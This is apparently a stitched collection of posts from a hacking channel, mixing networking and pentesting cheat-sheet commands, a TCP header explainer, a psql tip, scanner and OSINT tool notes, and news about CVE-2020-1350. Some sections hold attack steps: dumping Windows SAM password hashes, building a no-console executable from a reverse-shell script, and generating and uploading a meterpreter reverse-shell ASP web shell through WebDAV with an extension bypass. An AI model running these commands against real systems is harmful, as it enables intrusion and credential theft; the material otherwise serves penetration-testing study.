▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pyinstaller linux
#FastTips

python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py

+ Generate the .spec file.
+ Windows: (You want a single EXE file with your data in it, hence --onefile).

python pyinstaller.py --onefile yourmainfile.py

+ Rebuild your package.

python pyinstaller.py yourmainfile.spec

+Look for your .exe or your .app bundle in the dist directory.

#FastTips
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Pentesting tips :

Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop

+ Disable network-manager
service network-manager stop

+ Set IP address
ifconfig eth0 192.168.50.12/24

+ Set default gateway
route add default gw 192.168.50.9

+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf

+ Show routing table
Windows - route print
Linux - route -n

+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9

+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0

+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Internet Host/Network Enumeration

[+] WHOIS Querying
whois www.domain.com

[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com

[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx

[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any

[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup / ls -d domain.com.local

[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IP Network scanning

[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0

[+] NMAP Scans

[+] Nmap ping scan
sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)


[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

[+] Source port scanning
nmap -g <port> (88 (Kerberos) port 53 (DNS) or 67 (DHCP))
Source port also doesn't work for OS detection.

[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes

[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]

# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]

# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file

# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file

# Receive file
ncat [<host>] [<port>] > file

# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]

# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]

# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>

# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]

# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

exploit office 2016 any user !!

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cisco/Networking Commands

? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode

enable secret more secure than enable password.

For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted using the weak reversible algorithm.

enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify

#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords

✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Remote Information Services

+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...

[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers

+ NTP
Metasploit Auxiliarys

+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice

[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17

[+] RPC Services
rpcinfo -p
Endpointmapper metasploit

✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Web Services

+ WebDAV
Metasploit Auxiliarys
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reversetcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt

[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]

# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]

# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [outputfile]

# To use a proxy while scanning a host
perl nikto.pl -host host IP/name -useproxy proxy address


✅topic git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHY WE SHOULD USE TCP CONNECTIONS ?

> What is 1 TCP connection
Before examining the structure of the TCP packet header, let’s figure out what 1 TCP connection is - this will help to more clearly understand what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved when opening 1 page of a website? A typical website consists of 1 page of HTML code, several pages of cascading style sheets for CSS and JavaScript files, as well as a couple of dozens of image files. So, to receive each of these files, a new TCP connection is created. For each of these connections, a three-stage handshake is performed - this is to the question of what costs, "overhead" TCP carries.

> That is, when you open the website page, the browser makes the first TCP connection and receives the source code of the web page. In this code, the browser finds links to files of styles, scripts, images - a new TCP connection is launched for each of these files.

> Therefore, when analyzing traffic in Wireshark when you open even one web page, you will see many started and completed TCP connections.

1️⃣Source port - bits 0-15. This is the packet source port. The source port was originally associated directly with the process in the sending system. Today, we use a hash between the IP addresses and the destination and source ports to achieve this uniqueness, which we can associate with a single application or program.

2️⃣Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially directly connected to the process in the receiving system. Today, a hash is used instead, which allows us to have more open connections at the same time. When the packet is received, the destination and source ports return in response back to the original sending host, so that the destination port is now the source port and the source port is the destination port.

3️⃣The source port and destination port do not have to be the same: for example, if a request is made to the 80th port of the server, then this request may come, for example, from port 34054.

4️⃣The port numbers on the server can be used either standard or arbitrary.

5️⃣Sequence number - bits 32-63. The sequence number field is used to set the number in each TCP packet so that the TCP stream can be properly ordered (for example, packets are brought to the correct order). The serial number is then returned in the ACK field to confirm that the packet was received correctly.

Indicates the number of bytes transmitted, and each byte of payload transferred increases this value by 1.

6️⃣If the SYN flag is set (session is being established), then the field contains the initial serial number - ISN (Initial Sequence Number). For security purposes, this value is randomly generated and can be between 0 and 2 32 -1 (4294967295). The first byte of payload in the established session will be ISN + 1.

7️⃣Otherwise, if SYN is not set, the first byte of data transmitted in this packet has this serial number.

8️⃣Confirmation number (Acknowledgment Number (ACK SN)) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with one established sequence number, and if everything is in order with the packet, we respond with an ACK packet with a confirmation number equal to the original sequence number.
If the ACK flag is set, this field contains the octet number that the sender of this segment wants to receive. This means that all previous octets (with numbers from ISN + 1 to ACK-1 inclusive) were successfully received.

9️⃣Each side calculates its own Sequence number for the transmitted data and separately Acknowledgment number for the received data. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.

🔟The length of the header (data offset) is bits 96-99. This field indicates the length of the TCP packet header and where the actual data begins (payload). The field is 4 bits in size and indicates the TCP header in 32-bit words. The header should always end with an even 32-bit border, even with various options set (options may not be available at all, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
1️⃣1️⃣The minimum header size is 5 words, and the maximum is 15 words, which gives a minimum size of 20 bytes and a maximum of 60 bytes, which allows you to use up to 40 bytes of options in the header. This field received this name (data offset) because it also shows the location of the actual data from the beginning of the TCP segment.

1️⃣2️⃣So, the length of the header determines the offset of the payload relative to the beginning of the segment. For example, a Data offset of 1111 indicates that the title occupies fifteen 32-bit words (15 lines * 32 bits in each line / 8 bits = 60 bytes).

🦑TCP Session
TCP handshake (establishing a TCP connection)

> TCP uses a three-step handshake to establish a connection.

1) Connection can be made only if the other side is listening on the port to which the connection will be made: for example, the web server is listening on ports 80 and 443. That is, this is not covered by a handshake, but before the client tries to connect to the server, the server must first connect to the port and start listening to it to open it for connections: this is called passive opening. Once a passive discovery is established, the client can initiate an active discovery. To establish a connection, a three-stage (or three-stage) handshake occurs:

2) The first stage, sending a packet with the SYN flag enabled : active opening is performed by the client sending SYN to the server. The client sets the sequence number of the segment to a random value A.

Note that by default, Wireshark shows the relative value of the sequence number (Sequence number), just below you can also see the real value (shown as raw ).

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Connection termination

1️⃣The connection completion phase uses a four-stage handshake, with each side of the connection terminating independently. When an endpoint wants to stop its half of the connection, it sends a FIN packet, which the other end confirms with an ACK flag packet.

2️⃣Therefore, a typical break requires a pair of FIN and ACK segments from each TCP endpoint. After the party sending the first FIN responded with the last ACK, it waits for a timeout before finally closing the connection, during which the local port is not available for new connections; this prevents confusion due to delayed packets delivered during subsequent connections.

3️⃣The connection may be “half-open”, in which case one side has completed its part and the other has not. The terminating party can no longer send any data to the connection, but the other side can. The final side must continue reading the data until the other side also completes its work.

4️⃣It is also possible to break the connection with a three-step handshake when host A sends FIN, and host B answers FIN & ACK (just combines 2 steps into one) and host A answers ACK.

5️⃣Some operating systems, such as Linux and H-UX, implement a half-duplex closing sequence in the TCP stack. If the host actively closes the connection, but the incoming data remains unread, the host sends an RST signal (loss of all received data) instead of FIN. This guarantees the TCP application that the remote process has read all the transmitted data, waiting for the FIN signal before it actively closes the connection. The remote process cannot distinguish the RST signal to interrupt the connection and data loss. Both cause a remote stack to lose all received data.

6️⃣As you can see in the screenshot, the termination of the TCP connection also occurs as (Linux with the latest kernel):

Client: FIN-ACK

Server: FIN-ACK

Client: ACK

Written by Undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Display actual PostgreSQL queries
#REQUESTED

1) Display the actual queries generated by \ d and other backslash commands.

2) You can use this to examine PSQL internal operations.
This is equivalent to including the ECHO_HIDDEN variable

> \set ECHO_HIDDEN

🦑Output :

postgres=# \l
* QUERY **
SELECT d.datname as "Name",
pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
d.datcollate as "Collate",
d.datctype as "Ctype",
pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
FROM pg_catalog.pg_database d
ORDER BY 1;
******************

List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(3 rows)



▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Support & Share Us ❤️👍🏻

T.me/UndercodeTesting

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Network Terms in Angry IP Scanner
Further tips from the program itself:

general information

Angry IP Scanner tool for scanning IP addresses.

It is used to scan IP addresses in order to find active hosts and collect interesting information about each of them.

You can start by specifying the IP addresses for scanning (local IPs are entered by default) and clicking the "Start" button.

Key terms:

Feeder - Source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button

Data collector - collects specific information about the host, for example, ping time, host name, open ports. Collectors are usually columns as a result of a scan. They can be selected in the menu "Tools-> Data Collectors".

Active host - the host responding to ping. The results sheet is marked in blue.

Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). In order to fully scan such hosts, check the "Scan inactive" checkbox in Tools-> Preferences.

Open port - TCP port that responded to the connection attempt. Greens on the list.

Filtered port - TCP port, does not respond to the fact that it is closed (there is no RST packet). Probably these ports are specifically blocked by firewalls.

Pinging (host check):

Angry IP Scanner can use different ping methods. They can be selected in the "Preferences" window.

ICMP echo is the standard method used by the 'ping' program. On most platforms, requires administrator privileges. Some firewalls prohibit response packets to an ICMP request, making active hosts look inactive.

UDP - sends UDP packets (datagrams) to one of the host ports and monitors the response (whether or not). Not standard, but does not require privileges.

TCP - trying to connect to the 80 (http) port. UDP may work better for some networks, usually not.

Scanning UDP and TCP most often does not detect routers or other network equipment properly.

TTL (time to live) - this collector works only with ICMP ping. The initial value is usually 64 or 128, the difference shows the distance to the host in the number of nodes.

written by undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks..->
-termux-linux

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/HA71/Namechk.git

2️⃣cd Namechk

3️⃣Search available username: ./namechk.sh <username> -au

4️⃣Search available username on specifics websites: ./namechk.sh <username> -au -co

5️⃣Search available username list: ./namechk.sh -l -au

6️⃣Search used username: ./namechk.sh <username> -fu

7️⃣Search used username on specifics websites: ./namechk.sh <username> -fu -co

8️⃣Search used username list: ./namechk.sh -l -fu


ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft warns of major vulnerabilities in Windows DNS server
#News

> Microsoft warned that the company listed a key vulnerability in a Windows DNS server 17 years ago as a "worm." Such vulnerabilities may allow attackers to create special malware, execute code remotely on Windows servers, and create malicious DNS queries, which may eventually lead to the intrusion of infrastructure in enterprises and key departments.

> Visit the MSRC report:

https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/

> "Worm vulnerabilities can spread through vulnerable software through vulnerable software without user interaction," explains Mechele Gruhn, Microsoft's chief security project manager. "Windows DNS server is a core network component. Although it is not known whether this vulnerability is used for active attacks, customers must apply Windows updates as soon as possible to resolve this vulnerability."

> Researchers at Check Point discovered a security vulnerability in Windows DNS and reported it to Microsoft in May. If the patch is not applied, it will make the Windows server vulnerable to attacks, but Microsoft pointed out that there is no evidence of this flaw being used.

> Today, all supported versions of Windows Server provide patches to fix the vulnerability, but system administrators must patch the server as soon as possible before malicious actors create malware based on the vulnerability.

"DNS server vulnerability is a very serious matter," Omri Herscovici, the head of Check Point's vulnerability research team, warned. "Only a few of these types of vulnerabilities have been published. Every organization that uses Microsoft infrastructure, regardless of size, will face significant security risks if they do not apply patches. The worst consequence will be the complete destruction of the entire enterprise network. Microsoft's code has been in existence for more than 17 years; since we can find this vulnerability, it is not impossible for others to have discovered this vulnerability."

> Windows 10 and other client versions of Windows are not affected by this vulnerability, because it only affects Microsoft's Windows DNS Server implementation. Microsoft has also released a registry-based working method to prevent administrators from quickly addressing defects when they cannot quickly patch servers.

> Microsoft gave a maximum risk score of 10 on the Common Vulnerability Scoring System (CVSS), emphasizing the severity of the problem. In contrast, the vulnerability used in the WannaCry attack scored 8.5 on CVSS.

ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁